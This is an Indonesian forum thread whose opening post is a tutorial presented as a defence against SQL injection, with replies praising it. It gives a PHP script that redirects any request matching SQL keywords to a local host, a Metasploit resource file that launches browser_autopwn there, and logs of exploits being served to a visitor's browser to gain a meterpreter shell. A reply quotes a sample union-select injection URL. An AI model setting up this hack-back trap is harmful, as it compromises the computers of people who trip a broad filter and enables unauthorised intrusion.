[Share] menangkal serangan sqli dengan metasploit
#1
Star 
Hallo semua... kali ini saya ingin sharing , cara menangkal serangan sqli pada sebuah web,, menggunakan metasploit,,,,
Kebanyakan para attacker itu menggunakan windows,,,,
nah ini merupakan kesempatan bagi kita untuk melakukan serangan balik... :d

langsung aja nh ,,, maaf klo repost....
[hide]
buat script index.php
Code:
<?php
if (isset($_GET['xnod']) && preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $_GET['xnod']))
{
header('Location: http://192.168.1.100:4444');
}
?>
<html>
<body>
Silahkan dicoba
<a href="?xnod=2">test 1</a> - <a href="?xnod=2">test 2</a>- <a href="?xnod=6">test 3</a>
</body>
</html>

sipp sekrang buat script biar lebih mudah gunain metasploit
kasih nama antisqli.rc

Code:
# cat <<EOF> antisqli.rc
> use auxiliary/server/browser_autopwn
> set LHOST 192.168.100
> set SRVPORT 4444
> set URIPATH /
> run
> EOF

Nah sekarang kita jalanin metasploit sambil nunggu si attacker menyerang,,, sambil ngopi2 + makan gorengan..

./msfconsole -q -r antisqli.rc

silahkan tunggu smpe ada log seperti ini
Code:
192.168.1.5:1205 [302]: /?xnod=6%27
lama menunggu akhirnya ada jga yg kena nh..

Code:
msf  auxiliary(browser_autopwn) >
[*] 192.168.1.5    browser_autopwn - Handling '/'
[*] 192.168.1.5     browser_autopwn - Handling '/?sessid=TWljcm9zb2Z0IFdpbmRvd3M6Nzp1bmRlZmluZWQ6ZW4tVVM6eDg2OkZpcmVmb3g6MTIuMDo%3d'
[*] 192.168.1.5     browser_autopwn - JavaScript Report: Microsoft Windows:7:undefined:en-US:x86:Firefox:12.0:
[*] 192.168.1.5    browser_autopwn - Responding with 18 exploits
nah tunggu smpe masuk meterpreter,,, dan selanjutnya terserah anda,,,,, wkwkkwk
[/hide]
regards xnod_die

#2
wuihh keren bro tehniknya .... ijin belajar ya
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#3
\m/\m/\m/\m/ngintips.dan nyimaks
The Wolf

#4
hahaha. serangan balik ya om,
nice share deh .
+1 dari saya Smile
Code:
Username :   [ Hidemichi-Hiroyuki]

Password :   [     ********      ]

#5
nice share om.
keren nih,bisa di buat sebagai jebakan juga Big Grin

#6
wih mantep om.. Big Grin
bisa dijelasin ini maksudnya apa ?
by|select|\'|hex|substr|\s)/i', $_GET['xnod']))

wih mantep om.. Big Grin
bisa dijelasin ini maksudnya apa ?
by|select|\'|hex|substr|\s)/i', $_GET['xnod']))

#7
wwiih,,... mantap ..... super ini omz,.... Smile
5forA

#8
wkwkwk semacam honeypot juga yah buat sqli injector. Big Grin nice share bro.

#9
(04-24-2013, 07:04 PM)Unregistered Wrote: wih mantep om.. Big Grin
bisa dijelasin ini maksudnya apa ?
by|select|\'|hex|substr|\s)/i', $_GET['xnod']))

wih mantep om.. Big Grin
bisa dijelasin ini maksudnya apa ?
by|select|\'|hex|substr|\s)/i', $_GET['xnod']))

iya pake fungsi preg_match() di php... misalkan link kita http://localhost/index.php?xnod=6
trus attacker mau nyerang pake tehnik sqli http://localhost/index.php?xnod=6+union+select+1,2,3--
nah fungsi preg_match() itu langsung mengalihkan ke IP jebakan,,, Smile

#10
nice trick dude Smile buat di terapkan ke server training FWB keren nih wakakak






Users browsing this thread: 1 Guest(s)